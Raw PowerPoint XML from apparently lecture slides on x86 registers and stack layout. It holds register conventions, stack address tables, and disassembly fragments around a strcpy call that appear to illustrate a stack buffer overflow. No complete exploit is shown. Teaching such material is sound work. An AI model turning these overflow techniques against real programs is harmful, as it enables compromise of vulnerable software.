            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775071" y="518106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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="930259"/>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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="539264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28" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registers represent the local variables of the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are four 32-bit general purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accumulator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop counter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I/O operations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3028950"/>
            <a:ext cx="38100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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003532" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="402674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="2955131"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003537" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="990600"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003538" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4800600"/>
            <a:ext cx="38100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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003539" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="19050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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003541" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="338554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="4726781"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003544" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="2762250"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785854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352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2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52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352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0352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0352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0352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0352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035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0353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00353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0353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0353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00353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00353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003538"/>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00354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0354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003542"/>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003543"/>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0035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31" grpId="0" animBg="1"/>
      <p:bldP spid="1003532" grpId="0" animBg="1"/>
      <p:bldP spid="1003533" grpId="0" animBg="1"/>
      <p:bldP spid="1003534" grpId="0"/>
      <p:bldP spid="1003535" grpId="0"/>
      <p:bldP spid="1003536" grpId="0" animBg="1"/>
      <p:bldP spid="1003537" grpId="0" animBg="1"/>
      <p:bldP spid="1003538" grpId="0" animBg="1"/>
      <p:bldP spid="1003539" grpId="0" animBg="1"/>
      <p:bldP spid="1003541" grpId="0"/>
      <p:bldP spid="1003542" grpId="0"/>
      <p:bldP spid="1003543" grpId="0" animBg="1"/>
      <p:bldP spid="1003544" grpId="0" animBg="1"/>
    </p:bld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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="6451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46822" y="119787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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="260445" y="4336604"/>
          <a:ext cx="3696160" cy="2056355"/>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411271">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411271">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0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0xbffff6890</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0x0806e91b</a:t>
                      </a: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2"/>
            <a:ext cx="6256324" cy="395369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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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$0xa,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
